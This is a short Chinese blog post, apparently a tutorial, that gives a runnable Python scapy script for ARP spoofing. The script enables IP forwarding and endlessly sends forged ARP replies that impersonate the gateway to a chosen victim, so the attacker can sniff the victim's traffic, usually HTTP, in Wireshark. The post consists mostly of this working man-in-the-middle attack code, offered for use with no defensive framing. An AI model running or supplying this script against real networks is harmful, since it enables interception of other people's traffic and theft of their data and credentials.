python编写ARP拒绝服务攻击脚本--网路嗅探

python编写ARP拒绝服务攻击脚本–网路嗅探

**

(一)在前面的攻击脚本进行改进,配合 wireshark进行抓取,相比拒绝服务攻击脚 本、开启转发功能,使被攻击机能访问外部网络

**

from scapy.all import *
import uuid
import os

os.system('echo 1 >/proc/sys/net/ipv4/ip_forward') # 1 表示开启转发、0 表示不转发

def getselfMAC():
    mac= uuid.UUID(int = uuid.getnode()).hex[-12:]
    return ":".join([mac[e:e+2] for e in range(0,11,2)])

def arpspoof():
    gwIP = input('请输入网关地址:')
    mislendingIP = input("请输入攻击机地址:")
    mlmac = getmacbyip(mislendingIP)
    eth = Ether(dst=mlmac)
    arp = ARP(op=2,hwsrc=getselfMAC(),psrc=gwIP,hwdst=mlmac,pdst=mislendingIP)
    sendp(eth/arp,inter=2,loop=1)

arpspoof()

(二)通过wireshare进行抓包分析:
通常是抓取http协议的包
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值